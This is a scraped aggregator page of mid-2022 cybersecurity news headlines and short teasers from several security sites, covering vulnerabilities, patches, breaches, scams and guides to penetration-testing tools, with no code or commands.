If you grew up in the early 2000's like I did, you might have seen… How to become a video game tester on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/15/how-to-become-a-video-game-tester/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Xiaomi Phones' TEE Vulnerability May Allow Forge Mobile Payments
Researchers discovered a serious security vulnerability in MediaTek-powered Xiaomi Phones, allowing forged mobile payments due… Xiaomi Phones' TEE Vulnerability May Allow Forge Mobile Payments on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/15/xiaomi-phones-tee-vulnerability-may-allow-forge-mobile-payments/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Research Finds Facebook Tracks In-App Browser Activities On iOS Devices
A researcher noticed Facebook tracking users' activities on iOS devices when using the in-app browser… Research Finds Facebook Tracks In-App Browser Activities On iOS Devices on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/14/research-finds-facebook-tracks-in-app-browser-activities-on-ios-devices/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Researchers Discover Zimbra Authentication Bypass Flaw Under Attack
A severe authentication bypass vulnerability existed in the Zimbra Collaboration Suite (ZCS), risking email security.… Researchers Discover Zimbra Authentication Bypass Flaw Under Attack on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/14/researchers-discover-zimbra-authentication-bypass-flaw-under-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Palo Alto Warns About PAN-OS Vulnerability Under Attack
Technology giant Palo Alto Networks alerted their users about a severe PAN-OS vulnerability that allows… Palo Alto Warns About PAN-OS Vulnerability Under Attack on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/14/palo-alto-warns-about-pan-os-vulnerability-under-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Patch Tuesday August Fixes 120+ Vulnerabilities
The current week marked the arrival of monthly Patch Tuesday updates from Microsoft for August… Microsoft Patch Tuesday August Fixes 120+ Vulnerabilities on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/14/microsoft-patch-tuesday-august-fixes-120-vulnerabilities/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Credential Theft Is (Still) A Top Attack Method
Credential theft is clearly still a problem. Even after years of warnings, changing password requirements, and multiple forms of authentication, password stealing remains a top attack method used by cyber criminals. The latest report from the Ponemon Institute shares that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks. 59% of organizations
https://thehackernews.com/2022/08/credential-theft-is-still-top-attack.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Newly Uncovered PyPI Package Drops Fileless Cryptominer to Linux Systems
A now-removed rogue package pushed to the official third-party software repository for Python has been found to deploy cryptominers on Linux systems. The module, named "secretslib" and downloaded 93 times prior to its deletion, was released to the Python Package Index (PyPI) on August 6, 2022 and is described as "secrets matching and verification made easy." "On a closer
https://thehackernews.com/2022/08/newly-uncovered-pypi-package-drops.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Tornado Cash Developer Arrested After U.S. Sanctions the Cryptocurrency Mixer
Dutch authorities on Friday announced the arrest of a software developer in Amsterdam who is alleged to be working for Tornado Cash, days after the U.S. sanctioned the decentralized crypto mixing service. The 29-year-old individual is "suspected of involvement in concealing criminal financial flows and facilitating money laundering" through the service, the Dutch Fiscal Information and
https://thehackernews.com/2022/08/tornado-cash-developer-arrested-after.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chinese Hackers Backdoored MiMi Chat App to Target Windows, Linux, macOS Users
A pair of reports from cybersecurity firms SEKOIA and Trend Micro sheds light on a new campaign undertaken by a Chinese threat actor named Lucky Mouse that involves leveraging a trojanized version of a cross-platform messaging app to backdoor systems. Infection chains leverage a chat application called MiMi, with its installer files compromised to download and install HyperBro samples for the
https://thehackernews.com/2022/08/chinese-hackers-backdoored-mimi-chat.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Researchers Uncover UEFI Secure Boot Bypass in 3 Microsoft Signed Boot Loaders
A security feature bypass vulnerability has been uncovered in three signed third-party Unified Extensible Firmware Interface (UEFI) boot loaders that allow bypass of the UEFI Secure Boot feature. "These vulnerabilities can be exploited by mounting the EFI System Partition and replacing the existing bootloader with the vulnerable one, or modifying a UEFI variable to load the vulnerable loader
https://thehackernews.com/2022/08/researchers-uncover-uefi-secure-boot.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U.S. Government Offers Million Reward for Information on Conti Ransomware Gang
The U.S. State Department on Thursday announced a million reward for information related to five individuals associated with the Conti ransomware group. The reward offer is also notable for the fact that it marks the first time the face of a Conti associate, known as "Target," has been unmasked. The four other alleged members have been referred to as "Tramp," "Dandis," "Professor," and "
https://thehackernews.com/2022/08/us-government-offers-10-million-reward.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Facebook Testing Default End-to-End Encryption and Encrypted Backups in Messenger
Social media company Meta said it will begin testing end-to-end encryption (E2EE) on its Messenger platform this week for select users as the default option, as the company continues to slowly add security layers to its various chat services. "If you're in the test group, some of your most frequent chats may be automatically end-to-end encrypted, which means you won't have to opt in to the
https://thehackernews.com/2022/08/facebook-testing-default-end-to-end.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco Patches High-Severity Vulnerability Affecting ASA and Firepower Solutions
Cisco on Wednesday released patches to contain multiple flaws in its software that could be abused to leak sensitive information on susceptible appliances. The issue, assigned the identifier CVE-2022-20866 (CVSS score: 7.4), has been described as a "logic error" when handling RSA keys on devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)
https://thehackernews.com/2022/08/cisco-patches-high-severity.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fast and Secure VPN on a Budget? Private Internet Access VPN Has You Covered
Back when the internet consisted of a handful of computers networked together across a few research institutions, nobody could have imagined that it would one day form the backbone of a new digital way of life. And that probably explains why none of the researchers who thought up its core technologies — things like packet switching and TCP/IP — gave much consideration to the need to secure the
https://thehackernews.com/2022/08/fast-and-secure-vpn-on-budget-private.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Containers Vulnerability Scanner: Trivy
This article talks about Trivy, which is a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continuous Integration and Testing. Table The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
https://www.hackingarticles.in/containers-vulnerability-scanner-trivy/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MimiKatz for Pentester: Kerberos
This write-up will be part of a series of articles on the tool called Mimikatz which was created in the programming language C. it is The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
https://www.hackingarticles.in/mimikatz-for-pentester-kerberos/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Caldera: Red Team Emulation (Part 1)
This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
https://www.hackingarticles.in/caldera-red-team-emulation-part-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Domain Escalation: Unconstrained Delegation
Introduction Post-Windows 2000, Microsoft introduced an option where users could authenticate to one system via Kerberos and work with another system. This was made possible The post Domain Escalation: Unconstrained Delegation appeared first on Hacking Articles.
https://www.hackingarticles.in/domain-escalation-unconstrained-delegation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Domain Persistence: Silver Ticket Attack
Introduction Benjamin Delpy (the creator of mimikatz) introduced the silver ticket attack in Blackhat 2014 in his abusing Kerberos session. Silver tickets are forged service The post Domain Persistence: Silver Ticket Attack appeared first on Hacking Articles.
https://www.hackingarticles.in/domain-persistence-silver-ticket-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Detailed Guide on Rubeus
Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-rubeus/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Process Herpaderping (Mitre:T1055)
Introduction Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
https://www.hackingarticles.in/process-herpaderping-mitret1055/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Detailed Guide on Hydra
Hello! Pentesters, this article is about a brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent The post A Detailed Guide on Hydra appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-hydra/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Detailed Guide on HTML Smuggling
Introduction HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-html-smuggling/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Detailed Guide on Medusa
Hi Pentesters! Let's learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.
https://www.hackingarticles.in/a-detailed-guide-on-medusa/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Germany to mandate minimum security standards for web browsers in government
Less celebrated browsers and deprecated applications like Internet Explorer will be browsers non-grata
https://portswigger.net/daily-swig/germany-to-mandate-minimum-security-standards-for-web-browsers-in-government
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Healthcare provider Novant issues data breach warning after site tracking pixels sent patients' information to Meta servers
Leaked data potentially included patients' email addresses, phone numbers, and device IP addresses
https://portswigger.net/daily-swig/healthcare-provider-novant-issues-data-breach-warning-after-site-tracking-pixels-sent-patients-information-to-meta-servers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

IT industry guilty of ‘lack of imagination' in failure to anticipate cyber-attack evolution
‘We have a habit of reacting to threats after they occur, rather than preparing for them,' journalist Kim Zetter tells Black Hat
https://portswigger.net/daily-swig/it-industry-guilty-of-lack-of-imagination-in-failure-to-anticipate-cyber-attack-evolution
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BHUSA: Make sure your security bug bounty program doesn't create a data leak of its own
Researchers, organizations, and bug disclosure platforms can all make improvements to help protect user data
https://portswigger.net/daily-swig/bhusa-make-sure-your-security-bug-bounty-program-doesnt-create-a-data-leak-of-its-own
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GoTestWAF adds API attack testing via OpenAPI support
CI/CD support is next for WAF security tool
https://portswigger.net/daily-swig/gotestwaf-adds-api-attack-testing-via-openapi-support
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat USA: Pen testing tool that aims to ‘keep the fun in hacking' unveiled
Latest version of AttackForge ReportGen DevSecOps aid demonstrated during conference Arsenal track
https://portswigger.net/daily-swig/black-hat-usa-pen-testing-tool-that-aims-to-keep-the-fun-in-hacking-unveiled
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Browser-powered desync: New class of HTTP request smuggling attacks showcased at Black Hat USA
Renowned researcher James Kettle demonstrates his latest attack technique in Las Vegas
https://portswigger.net/daily-swig/browser-powered-desync-new-class-of-http-request-smuggling-attacks-showcased-at-black-hat-usa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ReNgine upgrade: New subscan feature, PDF reports, expanded toolbox showcased at Black Hat USA
Open source recon tool automates some of the more time-consuming pen testing tasks
https://portswigger.net/daily-swig/rengine-upgrade-new-subscan-feature-pdf-reports-expanded-toolbox-showcased-at-black-hat-usa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat USA: Deliberately vulnerable AWS, Azure cloud infrastructure is a pen tester's playground
AWSGoat and AzureGoat tools showcased in Las Vegas this week
https://portswigger.net/daily-swig/black-hat-usa-deliberately-vulnerable-aws-azure-cloud-infrastructure-is-a-pen-testers-playground
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat USA: Log4j de-obfuscator Ox4Shell ‘dramatically' reduces analysis time
Open source utility exposes payloads without running vulnerable Java code
https://portswigger.net/daily-swig/black-hat-usa-log4j-de-obfuscator-ox4shell-dramatically-reduces-analysis-time
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat USA: Ex-CISA director Chris Krebs urges orgs to bolster infrastructure amid Taiwan tensions
Attack on Taiwan seemingly a case of ‘when' not ‘if' Chris Krebs, the former director of the US Cybersecurity and Infrastructure Security Agency (CISA), says the infosec industry is “bearish in the sh
https://portswigger.net/daily-swig/black-hat-usa-ex-cisa-director-chris-krebs-urges-orgs-to-bolster-infrastructure-amid-taiwan-tensions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco router flaw gives patient attackers full access to small business networks
Vulnerable path is reachable just once a day, but patches still need to be implemented as a matter of priority
https://portswigger.net/daily-swig/cisco-router-flaw-gives-patient-attackers-full-access-to-small-business-networks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Edge deepens defenses against malicious websites with enhanced security mode
Browser adds defense in depth to prevent abuse of unpatched vulnerabilities
https://portswigger.net/daily-swig/microsoft-edge-deepens-defenses-against-malicious-websites-with-enhanced-security-mode
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Simple IDOR vulnerability in Reddit allowed mischief-makers to perform mod actions
Bug fixed within 24 hours and ,000 bug bounty awarded
https://portswigger.net/daily-swig/simple-idor-vulnerability-in-reddit-allowed-mischief-makers-to-perform-mod-actions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The best Black Hat and DEF CON talks of all time
Pwn stars
https://portswigger.net/daily-swig/the-best-black-hat-and-def-con-talks-of-all-time
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

XSS in Gmail's AMP For Email earns researcher ,000
Researcher bypasses email filter with inspired style tag trickery
https://portswigger.net/daily-swig/xss-in-gmails-amp-for-email-earns-researcher-5-000
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

High-impact vulnerability in DrayTek routers leaves thousands of SMEs open to exploitation
Now-patched RCE bug impacts dozens of DrayTek Vigor router models
https://portswigger.net/daily-swig/high-impact-vulnerability-in-draytek-routers-leaves-thousands-of-smes-open-to-exploitation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Authentication bypass bug in Nextauth.js could allow email account takeover
Vulnerability has been patched in latest versions
https://portswigger.net/daily-swig/authentication-bypass-bug-in-nextauth-js-could-allow-email-account-takeover
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chromium site isolation bypass allows wide range of attacks on browsers
Flaw that opened the door to cookie modification and data theft resolved
https://portswigger.net/daily-swig/chromium-site-isolation-bypass-allows-wide-range-of-attacks-on-browsers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ParseThru: HTTP parameter smuggling flaw uncovered in several Go applications
Harbor, Traefik, and Skipper projects tackle unsafe URL parsing methods
https://portswigger.net/daily-swig/parsethru-http-parameter-smuggling-flaw-uncovered-in-several-go-applications
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Swiss government announces upcoming launch of federal bug bounty program
Bug Bounty Switzerland AG awarded program management contract
https://portswigger.net/daily-swig/swiss-government-announces-upcoming-launch-of-federal-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Jenkins security: Unpatched XSS, CSRF bugs included in latest plugin advisory
‘We believe that announcing vulnerabilities without a fix is the best solution for a difficult problem'
https://portswigger.net/daily-swig/jenkins-security-unpatched-xss-csrf-bugs-included-in-latest-plugin-advisory
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trio of XSS bugs in open source web apps could lead to complete system compromise
Evolution CMS, FUDForum, and GitBucket vulnerabilities chained for maximum impact
https://portswigger.net/daily-swig/trio-of-xss-bugs-in-open-source-web-apps-could-lead-to-complete-system-compromise
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

‘You get respect for owning what happened' – SolarWinds' CISO on the legacy and lessons of Sunburst
Security chief counts new build system and greater intel sharing among positive legacies of watershed cyber-attack
https://portswigger.net/daily-swig/you-get-respect-for-owning-what-happened-solarwinds-ciso-on-the-legacy-and-lessons-of-sunburst
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CompleteFTP path traversal flaw allowed attackers to delete server files
Security issue fixed in version 22.1.1 of file transfer software
https://portswigger.net/daily-swig/completeftp-path-traversal-flaw-allowed-attackers-to-delete-server-files
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GitHub Actions workflow flaws provided write access to projects including Logstash
Malicious builds and wider infrastructural compromise were worst-case scenarios
https://portswigger.net/daily-swig/github-actions-workflow-flaws-provided-write-access-to-projects-including-logstash
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

XSS vulnerabilities in Google Cloud, Google Play could lead to account hijacks
Reflected XSS and DOM-based XSS bugs net researchers ,000 and ,000 bug bounties
https://portswigger.net/daily-swig/xss-vulnerabilities-in-google-cloud-google-play-could-lead-to-account-hijacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty Radar // The latest bug bounty programs for August 2022
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-august-2022
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GitHub enhances 2FA for NPM, improves security and manageability
New features also include ability to connect social media accounts
https://portswigger.net/daily-swig/github-enhances-2fa-for-npm-improves-security-and-manageability
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Onfido bug bounty program launched to help shore up ID verification defenses
Initiative adds another layer of protection for end-to-end identity verification platform
https://portswigger.net/daily-swig/onfido-bug-bounty-program-launched-to-help-shore-up-id-verification-defenses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

One in five data breaches due to software supply chain compromise, IBM report warns
Attack vector cost businesses 2.5% more in one year
https://portswigger.net/daily-swig/one-in-five-data-breaches-due-to-software-supply-chain-compromise-ibm-report-warns
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Open-Xchange issues fixes for RCE, SSRF bugs in OX App Suite
Security release also includes precautionary patches for potential Log4j-like flaw in Logback library
https://portswigger.net/daily-swig/open-xchange-issues-fixes-for-rce-ssrf-bugs-in-ox-app-suite
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FileWave MDM authentication bypass bugs expose managed devices to hijack risk
‘Vast majority' of users have updated systems thanks to vendor warnings
https://portswigger.net/daily-swig/filewave-mdm-authentication-bypass-bugs-expose-managed-devices-to-hijack-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Critical security vulnerability in Grails could lead to remote code execution
Maintainers warn to patch all versions of open source web app framework – even those not deemed vulnerable
https://portswigger.net/daily-swig/critical-security-vulnerability-in-grails-could-lead-to-remote-code-execution
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cloud fax company claims healthcare pros are ditching email for ‘more secure' fax
The fax is dead. Long live the online fax? A new study suggests many healthcare professionals believe that flaws in today's web security landscape are prompting a return to what's been deemed an “extr
https://portswigger.net/daily-swig/cloud-fax-company-claims-healthcare-pros-are-ditching-email-for-more-secure-fax
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco patches dangerous bug trio in Nexus Dashboard
Inadequate access control and CSRF protections spawn critical and high severity issues
https://portswigger.net/daily-swig/cisco-patches-dangerous-bug-trio-in-nexus-dashboard
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat USA 2022: Burnout, a significant issue
The digital skills gap, especially in cybersecurity, is not a new phenomenon. This problematic is now exacerbate by the prevalence of burnout, which was presented at Black Hat USA 2022 The post Black Hat USA 2022: Burnout, a significant issue appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/15/black-hat-2022-burnout-significant-issue/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat – Windows isn't the only mass casualty platform anymore
Windows used to be the big talking point when it came to exploits resulting in mass casualties. Nowadays, talks turned to other massive attack platforms like #cloud and cars The post Black Hat – Windows isn't the only mass casualty platform anymore appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/15/black-hat-cloud-hacking-casualty-platform/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The potential consequences of data breach, and romance scams – Week in security with Tony Anscombe
The NHS was victim of a potential cyberattack, which raises the question of the impact of those data breach for the public. The post The potential consequences of data breach, and romance scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/data-breach-romance-scams-week-in-security-with-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Black Hat 2022‑ Cyberdefense in a global threats era
Our Security evangelist's take on this first day of Black Hat 2022, where cyberdefense was on every mind. The post Black Hat 2022‑ Cyberdefense in a global threats era appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/12/black-hat-2022-cyberdefense-ukraine/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Safety first: how to tweak the settings on your dating apps
Tinder, Bumble or Grindr - popular dating apps depend heavily on your location, personal data, and loose privacy settings. Find out how to put yourself out there safely by following our suggested settings tweaks. The post Safety first: how to tweak the settings on your dating apps appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/12/safety-first-how-to-tweak-the-settings-on-your-dating-apps/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An eighties classic – Zero Trust
A deep-dive in Zero-trust, to help you navigate in a zero-trust world and further secure your organization. The post An eighties classic – Zero Trust appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/11/building-trust-zero-trust-channelcon/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to check if your PC has been hacked, and what to do next
Has your PC been hacked? Whatever happens, don't panic. Read on for ten signs your PC has been hacked and handy tips on how to fix it. The post How to check if your PC has been hacked, and what to do next appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/09/howto-check-hacked-pc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Develop a zero‑trust environment to protect your organization – Week in security with Tony Anscombe
Learn the basics of zero-trust, and how building a zero-trust environment can protect your organization. The post Develop a zero‑trust environment to protect your organization – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/develop-a-zero-trust-environment-to-protect-your-organization-week-in-security-with-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Don't get singed by scammers while you're carrying the torch for Tinder
Are you on Tinder? With 75 million monthly active users, you might be able to find the right one. However there are also traps you need to look out for. Read more about catfishing, sextortion, phishing and other practices used by scammers. The post Don’t get singed by scammers while you’re carrying the torch for Tinder  appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/04/protect-yourself-scammers-tinder-dating-app/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Start as you mean to go on: the top 10 steps to securing your new computer
Whether you are getting ready for back-to-school season, getting new work laptop or fancying a new gamer's pc, learn the steps to protect your new PC from cyberthreats. The post Start as you mean to go on: the top 10 steps to securing your new computer appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/02/10-steps-securing-your-new-computer/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Music streaming platform victim of a crypto theft – Week in security with Tony Anscombe
Cybercriminals exploited a vulnerability to steal the equivalent of 18M$ from the NFT music streaming platform Audius, while other cyberthreats related to crypto makes the news. The post Music streaming platform victim of a crypto theft – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/music-nft-platform-victim-of-a-crypto-theft-week-in-security-with-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Staying safe online: How to browse the web securely
Learn to spot some of the threats that you can face while browsing online, and the best tips to stay safe on the web. The post Staying safe online: How to browse the web securely appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/29/staying-safe-online-browse-web-securely/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cash App fraud: 10 common scams to watch out for
It pays to be careful – here's how you can stay safe from fake giveaways, money flipping scams and other cons that fraudsters use to trick payment app users out of their hard-earned cash The post Cash App fraud: 10 common scams to watch out for appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/27/cash-app-fraud-scams-watch-out/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NFT: A new‑fangled trend or also a new‑found treasure?
I've created an NFT so you don't have to – here's the good, the bad and the intangible of the hot-ticket tokens The post NFT: A new‑fangled trend or also a new‑found treasure? appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/25/nft-new-fangled-trend-new-found-treasure/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

macOS malware: myth vs. reality – Week in security with Tony Anscombe
ESET research shows yet again that macOS is not immune to malware and why some users can benefit from Apple's Lockdown Mode The post macOS malware: myth vs. reality – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/macos-malware-myth-vs-reality-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ESET Research Podcast: Hot security topics at RSA or mostly hype?
Listen to Cameron Camp, Juraj Jánošík, and Filip Mazán discuss the use of machine learning in cybersecurity, followed by Cameron's insights into the security of medical devices The post ESET Research Podcast: Hot security topics at RSA or mostly hype? appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/20/eset-research-podcast-hot-security-topics-rsa-or-mostly-hype/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

I see what you did there: A look at the CloudMensis macOS spyware
Previously unknown macOS malware uses cloud storage as its C&C channel and to exfiltrate documents, keystrokes, and screen captures from compromised Macs The post I see what you did there: A look at the CloudMensis macOS spyware appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Think twice before downloading pirated games – Week in security with Tony Anscombe
Why downloading pirated video games may ultimately cost you dearly and how to stay safe while gaming online The post Think twice before downloading pirated games – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/think-twice-downloading-pirated-games-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

API security moves mainstream
The heavyweights are now moving into API security, cementing it as “A Thing” The post API security moves mainstream appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/14/api-security-moves-mainstream/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Collaboration and knowledge sharing key to progress in cybersecurity
In a world of ever-evolving cyberthreats, collaboration and knowledge exchange are vital for keeping an edge on attackers The post Collaboration and knowledge sharing key to progress in cybersecurity appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/13/collaboration-knowledge-sharing-key-progress-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Play it safe: 5 reasons not to download pirated games
It's all fun and games until you get hacked – and this is just one risk of downloading cracked games The post Play it safe: 5 reasons not to download pirated games appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/12/play-it-safe-5-reasons-not-download-pirated-games/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Avoid travel digital disasters – Week in security with Tony Anscombe
Vacations are a great time to unwind, but if you're not careful, you may face a digital disaster. Here's how to keep your devices and data secure while you're on the move The post Avoid travel digital disasters – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/avoid-travel-digital-disasters-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Driving to France this summer? Watch out for scam websites before you go
Scammers don't take the summer off – be on your guard when buying your Crit'Air sticker The post Driving to France this summer? Watch out for scam websites before you go appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/08/driving-france-summer-watch-out-scam-websites/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

8 common Facebook Marketplace scams and how to avoid them
Here's what to watch out for when buying or selling stuff on the online marketplace and how to tell if you're being scammed The post 8 common Facebook Marketplace scams and how to avoid them appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/06/8-common-facebook-marketplace-scams-how-avoid/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyberattacks: A very real existential threat to organizations
One in five organizations have teetered on the brink of insolvency after a cyberattack. Can your company keep hackers at bay? The post Cyberattacks: A very real existential threat to organizations appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/04/cyberattacks-real-existential-threat-organizations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Watch out for survey scams – Week in security with Tony Anscombe
As scammers continue to ask people to take fake surveys, can you recognize some common telltale signs you're dealing with a scam? The post Watch out for survey scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/watch-out-survey-scams-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Phishing scam poses as Canadian tax agency before Canada Day
The lead-up to the Canada Day festivities has brought a tax scam with it The post Phishing scam poses as Canadian tax agency before Canada Day appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Costco 40th anniversary scam targets WhatsApp users
If the promise of a cash prize in return for answering a few questions sounds like a deal that is too good to be true, that's because it is The post Costco 40th anniversary scam targets WhatsApp users appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/30/costco-40th-anniversary-scam-targets-whatsapp-users/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Do back offices mean backdoors?
War in Europe, a reminder for shared service centers and shoring operations to re-examine IT security posture The post Do back offices mean backdoors? appeared first on WeLiveSecurity
